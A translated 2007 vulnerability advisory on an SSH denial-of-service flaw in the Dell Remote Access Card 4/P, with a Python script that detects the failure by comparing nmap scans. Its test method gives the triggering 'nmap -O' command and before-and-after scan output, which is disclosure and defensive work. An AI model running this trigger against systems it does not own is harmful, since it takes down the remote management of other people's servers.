Dell Remote Access Card SSH Remote Denial-of-Service Vulnerability

Published: 2007-08-13
Updated: 2007-08-14

Affected systems:
Dell Remote Access Card 4/P 1.50 (build 02.16)
Description:
BUGTRAQ ID: 25291

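The Dell Remote Access Card (DRAC) lets users manage servers remotely.

The DRAC's SSH service has a flaw in the way it handles malformed data connections. A remote attacker may be able to exploit it to make the SSH service unavailable.

If the SSH service of a Dell Remote Access Card is port-scanned with the nmap-4.03-3 port scanner bundled with Debian unstable or Ubuntu Dapper, the SSH port may become unavailable, and the whole system must be hard-reset with the racadm tool to recover.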

<*Source: Robert Scheck (scheck@etes.de)
  
  Link: http://marc.info/?l=full-disclosure&m=118703125510222&w=2
*>

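Test method:

Warning

The following procedure (method) may be offensive in nature and is provided for security research and teaching only. Use it at your own risk!

A normal port scan of the DRAC4's management IPv4 address looks like this: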

$ nmap -sV [Management IPv4 address of DRAC4]

Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-09 14:54 CEST
Interesting ports on xxx.xxx.xxx.xxx:
Not shown: 1693 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      Mocanada embedded SSH (protocol 2.0)
80/tcp   open  http     Dell Embedded Remote Access card webserver 1.0
443/tcp  open  ssl/http Dell Remote Access Controller http interface 2.0
5900/tcp open  vnc?
Service Info: Devices: terminal server, remote management

Nmap finished: 1 IP address (1 host up) scanned in 21.559 seconds
$

The following command shuts down the SSH daemon running on the DRAC4:

$ nmap -O [Management IPv4 address of DRAC4]
Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2007-07-09 14:55
CEST
Insufficient responses for TCP sequencing (0), OS detection may be less
accurate
Insufficient responses for TCP sequencing (0), OS detection may be less
accurate
Insufficient responses for TCP sequencing (0), OS detection may be less
accurate
Interesting ports on xxx.xxx.xxx.xxx:
(The 1670 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
5900/tcp open  vnc
No exact OS matches for host (If you know what OS is running on it, see
http://www.insecure.org/cgi-bin/nmap-submit.cgi).

Nmap finished: 1 IP address (1 host up) scanned in 65.943 seconds
$

At this point the SSH port is no longer available, and an SSH connection made with the OpenSSH client times out:

$ nmap -sV [Management IPv4 address of DRAC4]

Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-09 14:56 CEST
Interesting ports on xxx.xxx.xxx.xxx:
Not shown: 1693 closed ports
PORT     STATE    SERVICE  VERSION
22/tcp   filtered ssh
80/tcp   open     http     Dell Embedded Remote Access card webserver 1.0
443/tcp  open     ssl/http Dell Remote Access Controller http interface 2.0
5900/tcp open     vnc?
Service Info: Devices: terminal server, remote management

Nmap finished: 1 IP address (1 host up) scanned in 21.378 seconds
$
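
A way to notice this condition from a monitoring host, as an added example that is not part of the original advisory: the Python below compares the port table of a baseline service scan with a later one and reports ports that were open and no longer are. The function names are hypothetical, and the two sample tables are copied from the -sV scans shown above.

```python
import re

# Port-table rows in nmap's normal output: "22/tcp   open  ssh  <version...>"
PORT_ROW = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

def parse_ports(nmap_text):
    """Return {(port, proto): state} from nmap normal (terminal or -oN) output."""
    ports = {}
    for line in nmap_text.splitlines():
        m = PORT_ROW.match(line.strip())
        if m:
            ports[(int(m.group(1)), m.group(2))] = m.group(3)
    return ports

def lost_services(before_text, after_text):
    """List ports that were open in the baseline scan but are not open now."""
    before, after = parse_ports(before_text), parse_ports(after_text)
    lost = []
    for key, state in sorted(before.items()):
        if state != "open":
            continue
        # Assumption: a port absent from the later table was folded into
        # nmap's "Not shown" summary line, so it is reported as "not-shown".
        now = after.get(key, "not-shown")
        if now != "open":
            lost.append((key[0], key[1], now))
    return lost

# Port tables copied from the two -sV scans on this page.
BASELINE = """\
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      Mocanada embedded SSH (protocol 2.0)
80/tcp   open  http     Dell Embedded Remote Access card webserver 1.0
443/tcp  open  ssl/http Dell Remote Access Controller http interface 2.0
5900/tcp open  vnc?
"""
AFTER = """\
PORT     STATE    SERVICE  VERSION
22/tcp   filtered ssh
80/tcp   open     http     Dell Embedded Remote Access card webserver 1.0
443/tcp  open     ssl/http Dell Remote Access Controller http interface 2.0
5900/tcp open     vnc?
"""

if __name__ == "__main__":
    for port, proto, state in lost_services(BASELINE, AFTER):
        print(f"ALERT {port}/{proto}: open -> {state}")
```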

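Recommendation:
Vendor patch:

Dell
----
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: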

http://www.dell.com/

This vulnerability entry was translated and compiled by NSFOCUS. All rights reserved; do not reproduce without permission.